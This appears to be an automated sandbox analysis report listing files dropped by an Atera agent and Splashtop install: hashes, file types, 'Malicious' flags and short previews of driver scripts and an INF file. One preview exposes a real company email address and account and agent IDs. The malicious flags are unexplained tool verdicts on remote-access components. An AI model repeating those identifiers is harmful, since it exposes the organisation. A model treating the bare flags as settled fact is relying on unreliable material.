                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.934478472448458
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:6kfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFes:0+c7b1W4R6joxfQ8p
                                                                                                                                                                                                                                                                                                                                  MD5:A68241D6E026F218B259FD2CE8F744C0
                                                                                                                                                                                                                                                                                                                                  SHA1:DEA3F011BBC728DB750A054CCF3C5FDFE583EB91
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0F5B75176B338F03AF4BB287259F36167D86C7A6EF128FE021B7401854F2362
                                                                                                                                                                                                                                                                                                                                  SHA-512:1CBFA69C0F75ADAC4C61A84A803201E1897B2A24E50570C44048C6DDAB57A03A1DEBEE04671A8F1FE83745ECD8A91447A4E4E10611811A8B136B3B2016EAD119
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):331824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.168966743027853
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:KBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTe:KDMUWITZznu85k8Wdn8KmCjIFi3VvC
                                                                                                                                                                                                                                                                                                                                  MD5:DE6B588BD13AFFC760EE32D105C77A21
                                                                                                                                                                                                                                                                                                                                  SHA1:F9D20F683938F0347F0C2782D0E05FCFA143CEE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:07762DCF4082B9A14BEC37573058015F03D26B46B9A6B7B0C0E66402CBE256F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D0947E89ED1BF942C6BB93309BDD45B83FD92A3B8D0C4E3265A581DB9318B88187BDE5A58CFB5EE3A7BFE48167D4438B85D9FF03283C73A97B1C6022FE7CBCE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9607419702126485
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:cBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUZ:cBjk38WuBcAbwoA/BkjSHXP36RMGw
                                                                                                                                                                                                                                                                                                                                  MD5:C2EBB296A9B097C4BC36018341C2F514
                                                                                                                                                                                                                                                                                                                                  SHA1:55B79CCD4F93AC6EF3AE6E2AD858DE5F23516EC9
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CFB2C5E1947565F0795FCF5C0587B8F021842D52E79A40F25070BCABCE48089
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF95FA3B93A25E040D3521BF8436BBA505D09F659360C0606F259607083D9C4F1366683CFE0215D4F13CE875E753B12F1DE058A3D0CBB84C3948644D0E7BDEEB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2394409505734165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:rREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpBEpYinAMxCWLa:rR8+5k15z0WBZEtgwJq7Hx3u
                                                                                                                                                                                                                                                                                                                                  MD5:89D62604A1CA22A2F8FFD987B543D38E
                                                                                                                                                                                                                                                                                                                                  SHA1:64D7D345821AA76971BB9EF71CE731CCD9BFAC32
                                                                                                                                                                                                                                                                                                                                  SHA-256:80D4A38A5C0F117AFC7FC74A3F2DA39259BDD980BBA85687FF2019C8262E171D
                                                                                                                                                                                                                                                                                                                                  SHA-512:1173C7AFE2719EF324342A6D3EA459319533843CFE8A04CDC63FCF3D8A2D6DC4BB537FC1A4DBA63F585EB11F3E16FB2F17C53BC64BC7318A52B44266A3A9A56E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):602672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                                                                  MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                                                                  SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                                                                  SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                                                                  SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):73264
Entropy (8bit):5.954475034553661
Encrypted:false
SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
MD5:F4D9D65581BD82AF6108CFA3DD265A9A
SHA1:A926695B1E5D3842D8345C56C087E58845307A16
SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
Malicious:true
Reputation:unknown

Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:ASCII text, with CRLF, LF line terminators
Category:dropped
Size (bytes):272
Entropy (8bit):5.133534505163303
Encrypted:false
SSDEEP:6:A455XeQw9w3pKFSQFISk2GIHmWzkfIgDGzkfcgDX:551ekMSQFhB5lstX
MD5:3FE3FCA4356D1CE726FA939D66F5B505
SHA1:33B71DB013F669E83DDBB52F333E54E05485DB45
SHA-256:6828071DF5A286E9726E44CE0AA59E74CD1679544A8813B45BFCB6D46BB9EE92
SHA-512:AEF0BE3D87630B113F1387647E90A3D7F07B091DE188B2BAA7915CD5F421E1B9ACF45C4286E0013B6A02B014295E9CCFA8B20CD5D704C2ECAA9EE0F8F8C34ABD
Malicious:false
Reputation:unknown
Preview:/i /IntegratorLogin=000111.financeiro@yamahaconcessionaria.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000LlkxmIAB /AgentId=bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2.30/10/2024 18:30:08 Trace Starting..30/10/2024 18:30:26 Trace Starting..

Process:C:\Windows\System32\msiexec.exe
File Type:Algol 68 source, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):157873
Entropy (8bit):4.753497932507659
Encrypted:false
SSDEEP:3072:ZHXt/BWDLm8arfT4h6+2j+S64ioX+g15titNI6cSM:gDLmtrfT4hj2ju0X9wGSM
MD5:AB3D7C0401590BBDAF4B3C84592D24D6
SHA1:756F86B49CA2035638F77BBEB60CFE6A827B553E
SHA-256:4428A8B3F1A63312918FF5F8E1D5EE1F6EEBA9D73A336721338D494D2B6E5F6C
SHA-512:24AAC8D02347EF3E226531CA15B71714CB53546C7AA1B4D961A72E097C3528AE2590B00ECBAA7E80815E99FAFB6919D234E957DFCD08467CD753B24C004B6124
Malicious:false
Reputation:unknown
Preview:<pre>Acknowledgments....This Splashtop software incorporates materials from third parties, the use of which is hereby acknowledged.....================================================================....AES....Copyright (c) 1998-2010, Brian Gladman, Worcester, UK. All rights reserved.....The redistribution and use of this software (with or without changes)..is allowed without the payment of fees or royalties provided that:.... source code distributions include the above copyright notice, this.. list of conditions and the following disclaimer;.... binary distributions include the above copyright notice, this list.. of conditions and the following disclaimer in their documentation.....This software is provided 'as is' with no explicit or implied warranties..in respect of its operation, including, but not limited to, correctness..and fitness for purpose.....================================================================....CELT....Copyright 2001-2009 Jean-Marc Valin, Timothy B. Terri

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):310280
Entropy (8bit):6.406682858396138
Encrypted:false
SSDEEP:6144:B2ewUPD+fCEWepqJ1u45FC9xrIaPXiyVfl/7RohyyP16+Dfj8d3:NRPD+KLepIu4qnrIBy/7RoPfO
MD5:FB1A6F0CB84ACB237FF0E42E5CF876A6
SHA1:6CDEBFA5ABBF7BA48179DFF13A1343F3C4D9348F
SHA-256:DA5E12D077875B4F93210B10689F28B6EF33480E3BD2362E80F11EDFF8C9966D
SHA-512:2602908AB2FAF07C1957DAD00960F6432D08BDD7327DB96D1338C87B1E18CB025B381378BA4BC800F558D26D76922E5882481A99B17575D3D48208C289EE3B8D
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):249864
Entropy (8bit):6.627715385431378
Encrypted:false
SSDEEP:6144:gbNEPN9Db8oxccZd8lZOWb1yBGAOnpe6nbXcw:gc/8oxc5yBGVpJbXcw
MD5:151AAE6C0F0E40AB4138AF953768AB37
SHA1:18F55A0707EE7140776D7857D0AF56D471289960
SHA-256:F253CE8A8C4CDC4FD7A93A04515B208D461FF6E4076F64431E7EC7E9E5E08923
SHA-512:40FFF8741C8AFB0EF2E6F8F69755F8A2E1F6422943341BBE680EEEFE939731F39E59D1C608B7C23AA649C3F2D93E6104E6B420A755F551F555504E1028B91C68
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):40160
Entropy (8bit):6.316240044981803
Encrypted:false
SSDEEP:768:3z+6yz3JqnYCblcp6wOmMQC4cT3AZ21w6LuOBjEwXxyvJ3GB1C2GCTaZum8e:3ByY12kwOm8s2diSXCIB1yC2HT
MD5:1033D6EFB14B7C8308A261E7151A8FDD
SHA1:C331C67E93DA33EAAAAA0A4033855F185A79DE99
SHA-256:6A14EFEE1EAD8592B0E5199DB4E7256462F135D6DC10A803D98D03CFC4F1E678
SHA-512:083C365FD00BDED1637CBA2DDCE2FC3D93A8C60122F01CCD675A13EFF4C7663EE0FCE1B3316755FC971B3A3E6D242E29236180508D03C803950E2159B374767B
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.68750285687923
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dCiI4FDIIlfILQIIbdELV0Lr+FDIIGKhaL3C:kidCiRxt2QjdRCxeKcL3C
                                                                                                                                                                                                                                                                                                                                  MD5:EBC2A6216B737E813732ECA1BB1F2AF2
                                                                                                                                                                                                                                                                                                                                  SHA1:6E63AB58C2055A3F276C1CD36FA406E37C099099
                                                                                                                                                                                                                                                                                                                                  SHA-256:275C9771ED3AC2ABE0989A114804ADD0CCED09F8A1BFF1633C4F79929921713B
                                                                                                                                                                                                                                                                                                                                  SHA-512:248CD17E4836B429DF0923E8C04FD3F8ECAB7CC8BFF6761F06AAED420111FF5DBADCC974193701DEBF63655CD79E8E0D0B6C7599760B13ABA19B5C0E178BF7EC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd.exe /u stgamepad.inf >> inst.log..utils\devcon.exe install stgamepad.inf root\stgamepad >> inst.log..utils\enum.exe -p 1000 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.776744518403625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLPI4FDIIlBILQIIbdRL6V0Lr+FDIItGKhaL3C:kiddRxr2QjdHCxwKcL3C
                                                                                                                                                                                                                                                                                                                                  MD5:4AD78E888894B3F89711D75D526E2D9A
                                                                                                                                                                                                                                                                                                                                  SHA1:A01DD7B5F20052AB27B721127DAB01A34666D4D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:8B82E0E205711B8A22939AB86BF955DB938D2A733F57E48404DD118B5DDB9AE5
                                                                                                                                                                                                                                                                                                                                  SHA-512:CD6C972070593A6FE09778BC043C84CABE61E96FC3EA1B529D993540678AE0E99A641BFFAB87B3AE954977F0C0A9C639185889421225C185615C4EC34A8699F3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd64.exe /u stgamepad.inf >> inst.log..utils\devcon64.exe install stgamepad.inf root\stgamepad >> inst.log..utils\enum64.exe -p 1000 >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8955
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.156854915296666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3F37o7MECwCNnYe+PjPGr9ZCApkT1rrZgjlerpLF+vc1rbrRnJ4aTT:3NEuwCNnYPL/p1P6jeL3JrRiaT
                                                                                                                                                                                                                                                                                                                                  MD5:214E5DB2F6D3FF72B6E4F3BACCD7ECB0
                                                                                                                                                                                                                                                                                                                                  SHA1:64CC6A8F3E79BFA0301924D4A18370CFDD8ED955
                                                                                                                                                                                                                                                                                                                                  SHA-256:C23C1C358705DCE49FD6D1BEB1B0482F74DFCE35FEE7AE4D0C79390385FD22F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:E31E2455A7014937F3E9ECA05D192320CF6159CED333888C6612BE36453F72D76F1015FC1306D41F41CD5F4CB206028ECD99C0F28505D29B6E9E0F497D231D17
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1598
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348428467214068
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:BoJAo10StKRqv8rI3OB/7wBZBZhvC3R7YxGcSF+125dLH/kvGPGo:BoJbkEvReNErZZcQ125CvQR
                                                                                                                                                                                                                                                                                                                                  MD5:5AE5F4B07FABDB969DDA6425E54C4DDD
                                                                                                                                                                                                                                                                                                                                  SHA1:A6686543B1236618863A1FA63FA2B14FA8AE54FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:489CFA94B8FAEA97E0CF73714A65890418247BF34023DC4FDEBB03EF233B12F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C8751CF986E7A2800924D9707FB40AA95F5EE2431E16D5EEDC583FEA1F5351C95BF3FD90AC0EBD81AFC7262FBFA6C452BF1CA1B908E7360515970F146D0D6E50
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$CHICAGO$"..Class=System..ClassGuid={4D36E97D-E325-11CE-BFC1-08002BE10318}..Provider=%splashtop%..DriverVer=05/21/2013,1.0.0.0..CatalogFile=stgamepad.cat....[SourceDisksFiles]..stgamepad.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,\64bits....[DestinationDirs]..DefaultDestDir = 12....[Manufacturer]..%splashtop% = Vendor, NTx86, NTx86.6.1, NTAMD64, NTAMD64.6.1....[Vendor.NTx86]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTAMD64]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTx86.6.1]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTAMD64.6.1]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[StGamepad_Install.NT]..CopyFiles = StGamepad_Install.NT.Copy....[StGamepad_Install.NT.hw]..AddReg = StGamepad_Device_AddReg....[StGamepad_Install.NT.Copy]..stgamepad.sys....[StGamepad_Device_AddReg]....[StGamepad_Install.NT.Service
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4990196288743425
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Uwyk2eCK3PRiZ1bcvrlEeT0OEM859sKkgTvEakiX5vFmXhBcfoaM8l1l3nzWPDP8:UupCJeT5EgKkgTMa3VFMmAalaPzumy
                                                                                                                                                                                                                                                                                                                                  MD5:4C3233F0B9A5BC7B58B464C9E1E86D52
                                                                                                                                                                                                                                                                                                                                  SHA1:FCCE254ED5DF8DE6D21623A6E53FA2AEEE030365
                                                                                                                                                                                                                                                                                                                                  SHA-256:832328B8DD98D51A9CE29C3953E85AFB036964299B93B9FB929023F15C63AD9A
                                                                                                                                                                                                                                                                                                                                  SHA-512:884A22B0CE16B91B1A04D6B5E99678CC584484FF5BE3D92ADDB27F0E9D58BFF57A9716C843789F9BD59EC79A55EF342DFD2A0EF39C6E7776CD4FC0211EE8DFCF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):154
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.715757968072225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy9kCCWo7EIbd/KiIKTAxsHs2yo7EIl2YILzDoC:/AjsC3IIbdCiI4FDIIlfILQC
                                                                                                                                                                                                                                                                                                                                  MD5:5D33C035F7B22B463DBD01BC0D31C9E9
                                                                                                                                                                                                                                                                                                                                  SHA1:5345461EF02D330178F047FFBD40C5F4B142A416
                                                                                                                                                                                                                                                                                                                                  SHA-256:45C7D88A3D4643220137D23DBE0EB5CE45DFB6AD16EDC1D6EE4CA8FD1C41AF49
                                                                                                                                                                                                                                                                                                                                  SHA-512:88E339E01417D6EFAA8271E6F3A9D077711508A3EE4D0CF3A95E6607C0282D201633113EACB8A142189F54476AD7B501EAEEA5AC2D9297A06B1A7A55D73B8940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\enum.exe -u 0 >> inst.log..utils\devcon.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd.exe /u stgamepad.inf >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.807126999960993
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy9dJFtCWo7EIbdRLX/IKTAxsHs2yo7EIl3xILzDoC:/AjsZW3IIbdRLPI4FDIIlBILQC
                                                                                                                                                                                                                                                                                                                                  MD5:D0E7FCE8A8281FC10CB9548299254079
                                                                                                                                                                                                                                                                                                                                  SHA1:112A4EA65D2CC4A1C57EB6967AC058C8EDE341DE
                                                                                                                                                                                                                                                                                                                                  SHA-256:11F757D09B095A89D52A990149379618551D88E92E1C9BEEFED243A083487260
                                                                                                                                                                                                                                                                                                                                  SHA-512:8132F0DFE0071D3CA3CC5D4CD6ED2634E61314BF6BB84AF5B5F97261E3E26601F1C6AA5C8ABBDA596639CAF4C0E2AFC3A2DE46BB92C199894DD5CFC2DF519CFF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\enum64.exe -u 0 >> inst.log..utils\devcon64.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd64.exe /u stgamepad.inf >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.289815206775557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Qexcism3zhYFH1u0BFhdzQV3TdfPq12pru6JEkb8oHA1Ib/meUmV:QeKduuf1+DEgprhh82Tirm
                                                                                                                                                                                                                                                                                                                                  MD5:5F1E3F3B071AB0D51AB45060D156AF17
